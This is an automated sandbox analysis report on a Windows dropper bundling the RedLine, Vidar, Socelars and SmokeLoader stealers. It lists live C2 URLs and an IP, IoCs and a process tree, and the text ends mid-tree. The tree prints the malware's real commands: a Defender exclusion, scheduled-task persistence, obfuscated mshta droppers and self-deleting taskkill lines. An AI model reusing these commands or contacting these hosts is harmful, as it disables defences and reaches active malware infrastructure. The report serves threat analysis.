redline | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

max time kernel
187s
max time network
192s
platform
windows10_x64
resource
win10-en-20211104
submitted
09-11-2021 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe
Size

5.9MB
MD5

1f998b076047371b95763abf57a2eb5f
SHA1

8ef5c726e13d658b2be905e5274cdb0ae5fd60ca
SHA256

4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0
SHA512

c9f3603af56effaee8a6027339d359c4954251d17d3168e638eba99fdfc25d1082de86d6bff601f985b4f8819b9808c4e2dcaa8b97947d9595edf791f986f716

Score

10^/10

redline smokeloader socelars vidar 916 ani aspackv2 backdoor evasion infostealer spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

vidar

Version

41.4

Botnet

916

https://mas.to/@sslam

Attributes

profile_id
916

Extracted

Family

redline

Botnet

ANI

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	4704	rundll32.exe	123

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral32/memory/1740-269-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral32/memory/1740-270-0x000000000041B23A-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral32/files/0x000600000001abb0-155.dat	family_socelars
behavioral32/files/0x000600000001abb0-152.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4148 created 2980	4148	WerFault.exe	98
PID 4436 created 3124	4436	WerFault.exe	91

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral32/memory/3124-245-0x00000000024E0000-0x00000000025B6000-memory.dmp	family_vidar
behavioral32/memory/3124-252-0x0000000000400000-0x00000000007F3000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral32/files/0x000300000001ab46-124.dat	aspack_v212_v242
behavioral32/files/0x000400000001abab-130.dat	aspack_v212_v242
behavioral32/files/0x000400000001abab-129.dat	aspack_v212_v242
behavioral32/files/0x000300000001ab46-125.dat	aspack_v212_v242
behavioral32/files/0x000300000001ab48-126.dat	aspack_v212_v242
behavioral32/files/0x000300000001ab48-123.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 21 IoCs

pid	Process
1964	setup_install.exe
1884	Sun200cf279a6744ade.exe
488	Sun206dd01337.exe
380	Sun205d248acee.exe
2012	Sun20b99c3db8.exe
4032	Sun203f145fb9.exe
3920	Sun2014ac4fc408.exe
2028	Sun2095905c782bdef1b.exe
3124	Sun20cd15903bdf186c.exe
2980	Sun200936428e7b3.exe
3264	Sun204b77de9242c.exe
1040	Sun204b8743bbceb04.exe
2396	Sun200762fa1d3317c.exe
1324	Sun201886ca1ab679bd7.exe
1956	Sun204668cb84a0.exe
2196	Sun20b99c3db8.tmp
1540	Sun20b99c3db8.exe
3744	Sun20b99c3db8.tmp
4412	09xU.exE
1740	Sun204b77de9242c.exe
4524	2au6eXBO.eXe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	Sun206dd01337.exe

Loads dropped DLL 7 IoCs

pid	Process
1964	setup_install.exe
1964	setup_install.exe
1964	setup_install.exe
1964	setup_install.exe
1964	setup_install.exe
2196	Sun20b99c3db8.tmp
3744	Sun20b99c3db8.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
50	ipinfo.io
228	ipinfo.io
229	ipinfo.io
24	ip-api.com
49	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3264 set thread context of 1740	3264	Sun204b77de9242c.exe	110

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 11 IoCs

pid	pid_target	Process	procid_target
1208	1964	WerFault.exe	68
1924	380	WerFault.exe	79
4148	2980	WerFault.exe	98
4368	380	WerFault.exe	79
4436	3124	WerFault.exe	91
4584	380	WerFault.exe	79
4924	380	WerFault.exe	79
4304	380	WerFault.exe	79
1820	380	WerFault.exe	79
2928	380	WerFault.exe	79
4592	380	WerFault.exe	79

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun204b8743bbceb04.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun204b8743bbceb04.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun204b8743bbceb04.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2332	schtasks.exe
5336	schtasks.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
5044	taskkill.exe
4844	taskkill.exe
4716	taskkill.exe
6116	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
612	powershell.exe
612	powershell.exe
1040	Sun204b8743bbceb04.exe
1040	Sun204b8743bbceb04.exe
612	powershell.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe
488	Sun206dd01337.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1040	Sun204b8743bbceb04.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeAssignPrimaryTokenPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeLockMemoryPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeIncreaseQuotaPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeMachineAccountPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeTcbPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeSecurityPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeTakeOwnershipPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeLoadDriverPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeSystemProfilePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeSystemtimePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeProfSingleProcessPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeIncBasePriorityPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeCreatePagefilePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeCreatePermanentPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeBackupPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeRestorePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeShutdownPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeDebugPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeAuditPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeSystemEnvironmentPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeChangeNotifyPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeRemoteShutdownPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeUndockPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeSyncAgentPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeEnableDelegationPrivilege	1884	Sun200cf279a6744ade.exe
Token: SeManageVolumePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeImpersonatePrivilege	1884	Sun200cf279a6744ade.exe
Token: SeCreateGlobalPrivilege	1884	Sun200cf279a6744ade.exe
Token: 31	1884	Sun200cf279a6744ade.exe
Token: 32	1884	Sun200cf279a6744ade.exe
Token: 33	1884	Sun200cf279a6744ade.exe
Token: 34	1884	Sun200cf279a6744ade.exe
Token: 35	1884	Sun200cf279a6744ade.exe
Token: SeDebugPrivilege	2396	Sun200762fa1d3317c.exe
Token: SeDebugPrivilege	612	powershell.exe
Token: SeRestorePrivilege	1208	WerFault.exe
Token: SeBackupPrivilege	1208	WerFault.exe
Token: SeDebugPrivilege	1956	Sun204668cb84a0.exe
Token: SeDebugPrivilege	1208	WerFault.exe
Token: SeDebugPrivilege	1924	WerFault.exe
Token: SeDebugPrivilege	4148	WerFault.exe
Token: SeDebugPrivilege	4368	WerFault.exe
Token: SeDebugPrivilege	4436	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 1964	1312	4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe	68
PID 1312 wrote to memory of 1964	1312	4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe	68
PID 1312 wrote to memory of 1964	1312	4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe	68
PID 1964 wrote to memory of 1520	1964	setup_install.exe	71
PID 1964 wrote to memory of 1520	1964	setup_install.exe	71
PID 1964 wrote to memory of 1520	1964	setup_install.exe	71
PID 1520 wrote to memory of 612	1520	cmd.exe	72
PID 1520 wrote to memory of 612	1520	cmd.exe	72
PID 1520 wrote to memory of 612	1520	cmd.exe	72
PID 1964 wrote to memory of 2384	1964	setup_install.exe	73
PID 1964 wrote to memory of 2384	1964	setup_install.exe	73
PID 1964 wrote to memory of 2384	1964	setup_install.exe	73
PID 1964 wrote to memory of 1260	1964	setup_install.exe	74
PID 1964 wrote to memory of 1260	1964	setup_install.exe	74
PID 1964 wrote to memory of 1260	1964	setup_install.exe	74
PID 1964 wrote to memory of 408	1964	setup_install.exe	78
PID 1964 wrote to memory of 408	1964	setup_install.exe	78
PID 1964 wrote to memory of 408	1964	setup_install.exe	78
PID 1964 wrote to memory of 3512	1964	setup_install.exe	75
PID 1964 wrote to memory of 3512	1964	setup_install.exe	75
PID 1964 wrote to memory of 3512	1964	setup_install.exe	75
PID 408 wrote to memory of 1884	408	cmd.exe	76
PID 408 wrote to memory of 1884	408	cmd.exe	76
PID 408 wrote to memory of 1884	408	cmd.exe	76
PID 2384 wrote to memory of 488	2384	cmd.exe	77
PID 2384 wrote to memory of 488	2384	cmd.exe	77
PID 2384 wrote to memory of 488	2384	cmd.exe	77
PID 1964 wrote to memory of 956	1964	setup_install.exe	80
PID 1964 wrote to memory of 956	1964	setup_install.exe	80
PID 1964 wrote to memory of 956	1964	setup_install.exe	80
PID 3512 wrote to memory of 380	3512	cmd.exe	79
PID 3512 wrote to memory of 380	3512	cmd.exe	79
PID 3512 wrote to memory of 380	3512	cmd.exe	79
PID 1964 wrote to memory of 3572	1964	setup_install.exe	81
PID 1964 wrote to memory of 3572	1964	setup_install.exe	81
PID 1964 wrote to memory of 3572	1964	setup_install.exe	81
PID 1260 wrote to memory of 2012	1260	cmd.exe	85
PID 1260 wrote to memory of 2012	1260	cmd.exe	85
PID 1260 wrote to memory of 2012	1260	cmd.exe	85
PID 1964 wrote to memory of 4044	1964	setup_install.exe	84
PID 1964 wrote to memory of 4044	1964	setup_install.exe	84
PID 1964 wrote to memory of 4044	1964	setup_install.exe	84
PID 1964 wrote to memory of 1560	1964	setup_install.exe	83
PID 1964 wrote to memory of 1560	1964	setup_install.exe	83
PID 1964 wrote to memory of 1560	1964	setup_install.exe	83
PID 1964 wrote to memory of 3680	1964	setup_install.exe	82
PID 1964 wrote to memory of 3680	1964	setup_install.exe	82
PID 1964 wrote to memory of 3680	1964	setup_install.exe	82
PID 1964 wrote to memory of 980	1964	setup_install.exe	100
PID 1964 wrote to memory of 980	1964	setup_install.exe	100
PID 1964 wrote to memory of 980	1964	setup_install.exe	100
PID 956 wrote to memory of 4032	956	cmd.exe	89
PID 956 wrote to memory of 4032	956	cmd.exe	89
PID 956 wrote to memory of 4032	956	cmd.exe	89
PID 1964 wrote to memory of 2176	1964	setup_install.exe	88
PID 1964 wrote to memory of 2176	1964	setup_install.exe	88
PID 1964 wrote to memory of 2176	1964	setup_install.exe	88
PID 3572 wrote to memory of 3920	3572	cmd.exe	87
PID 3572 wrote to memory of 3920	3572	cmd.exe	87
PID 3572 wrote to memory of 3920	3572	cmd.exe	87
PID 980 wrote to memory of 2028	980	cmd.exe	86
PID 980 wrote to memory of 2028	980	cmd.exe	86
PID 980 wrote to memory of 2028	980	cmd.exe	86
PID 1964 wrote to memory of 2092	1964	setup_install.exe	90

C:\Users\Admin\AppData\Local\Temp\4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe
"C:\Users\Admin\AppData\Local\Temp\4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1312
- C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun206dd01337.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun206dd01337.exe
      Sun206dd01337.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious behavior: EnumeratesProcesses
      PID:488
    - - C:\Users\Admin\Pictures\Adobe Films\tqwjgXGL4lN2iRhvnq_wm0RN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tqwjgXGL4lN2iRhvnq_wm0RN.exe"
        5⤵
        
        PID:4780
    - - C:\Users\Admin\Pictures\Adobe Films\GvrOYaZxlyU7RpROKInJNJUz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GvrOYaZxlyU7RpROKInJNJUz.exe"
        5⤵
        
        PID:1736
    - - C:\Users\Admin\Pictures\Adobe Films\yjDXG6OKPAYiiARuw31aIYb9.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\yjDXG6OKPAYiiARuw31aIYb9.exe"
        5⤵
        
        PID:1344
    - - C:\Users\Admin\Pictures\Adobe Films\Csvact6OyCqJLZFuFRZH3yxS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Csvact6OyCqJLZFuFRZH3yxS.exe"
        5⤵
        
        PID:1080
    - - C:\Users\Admin\Pictures\Adobe Films\gK1Fsdp6rJYW14aHpBUwt5OE.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gK1Fsdp6rJYW14aHpBUwt5OE.exe"
        5⤵
        
        PID:4980
    - - C:\Users\Admin\Pictures\Adobe Films\y2hXc5mHxN1g6DPMf7HTrxWE.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\y2hXc5mHxN1g6DPMf7HTrxWE.exe"
        5⤵
        
        PID:5052
    - - C:\Users\Admin\Pictures\Adobe Films\14dIIdn_f9ug7bqD3woldqTW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\14dIIdn_f9ug7bqD3woldqTW.exe"
        5⤵
        
        PID:4220
      - C:\Users\Admin\Pictures\Adobe Films\14dIIdn_f9ug7bqD3woldqTW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\14dIIdn_f9ug7bqD3woldqTW.exe"
        6⤵
        
        PID:5584
    - - C:\Users\Admin\Pictures\Adobe Films\nlSJGTZjcD6Tf7CXOMCymLFN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nlSJGTZjcD6Tf7CXOMCymLFN.exe"
        5⤵
        
        PID:4256
    - - C:\Users\Admin\Pictures\Adobe Films\o7nMjM2GT_BHJMbt6rO_qPBV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\o7nMjM2GT_BHJMbt6rO_qPBV.exe"
        5⤵
        
        PID:1072
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:2332
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5336
      - C:\Users\Admin\Documents\QQ0Ef2hT0Xrh0f7tOz6U11ju.exe
        
        "C:\Users\Admin\Documents\QQ0Ef2hT0Xrh0f7tOz6U11ju.exe"
        6⤵
        
        PID:2028
    - - C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe"
        5⤵
        
        PID:4900
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        6⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\CgwVz8YsrDutPUpR32_T0puY.exe" ) do taskkill -im "%~NxK" -F
        7⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        8⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        9⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        10⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "CgwVz8YsrDutPUpR32_T0puY.exe" -F
        8⤵
        Kills process with taskkill
        
        PID:6116
    - - C:\Users\Admin\Pictures\Adobe Films\FbenHSQO_mJxiAdy7qoLsDdN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\FbenHSQO_mJxiAdy7qoLsDdN.exe"
        5⤵
        
        PID:1184
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "FbenHSQO_mJxiAdy7qoLsDdN.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\FbenHSQO_mJxiAdy7qoLsDdN.exe" & exit
        6⤵
        
        PID:5664
    - - C:\Users\Admin\Pictures\Adobe Films\iugkWfYQM4jtgYnRLhHGXWW7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\iugkWfYQM4jtgYnRLhHGXWW7.exe"
        5⤵
        
        PID:4628
    - - C:\Users\Admin\Pictures\Adobe Films\6tEP3ShIBplPry66wafp8AZf.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6tEP3ShIBplPry66wafp8AZf.exe"
        5⤵
        
        PID:2304
      - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        6⤵
        
        PID:4468
    - - C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe"
        5⤵
        
        PID:2884
      - C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe"
        6⤵
        
        PID:5344
      - C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe"
        6⤵
        
        PID:5596
      - C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vzr9OHcdBrSPzrQ0c56wmGff.exe"
        6⤵
        
        PID:6040
    - - C:\Users\Admin\Pictures\Adobe Films\gDD13oH3_MeYekwv7_8YxRwG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gDD13oH3_MeYekwv7_8YxRwG.exe"
        5⤵
        
        PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun20b99c3db8.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun20b99c3db8.exe
      Sun20b99c3db8.exe
      4⤵
      Executes dropped EXE
      PID:2012
    - - C:\Users\Admin\AppData\Local\Temp\is-MPH75.tmp\Sun20b99c3db8.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MPH75.tmp\Sun20b99c3db8.tmp" /SL5="$40118,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun20b99c3db8.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2196
      - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun20b99c3db8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun20b99c3db8.exe" /SILENT
        6⤵
        Executes dropped EXE
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\is-FLO6F.tmp\Sun20b99c3db8.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FLO6F.tmp\Sun20b99c3db8.tmp" /SL5="$1021A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun20b99c3db8.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun205d248acee.exe /mixone
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun205d248acee.exe
      Sun205d248acee.exe /mixone
      4⤵
      Executes dropped EXE
      PID:380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 656
        5⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 668
        5⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 640
        5⤵
        Program crash
        
        PID:4584
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 808
        5⤵
        Program crash
        
        PID:4924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 840
        5⤵
        Program crash
        
        PID:4304
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 904
        5⤵
        Program crash
        
        PID:1820
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 1192
        5⤵
        Program crash
        
        PID:2928
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 1220
        5⤵
        Program crash
        
        PID:4592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun200cf279a6744ade.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun203f145fb9.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun203f145fb9.exe
      Sun203f145fb9.exe
      4⤵
      Executes dropped EXE
      PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun2014ac4fc408.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Users\Admin\AppData\Local\Temp\7zS025B82B6\Sun2014ac4fc408.exe
      Sun2014ac4fc408.exe
      4⤵
      Executes dropped EXE
      PID:3920
    - - C:\Windows\SysWOW64\mshta.exe
        
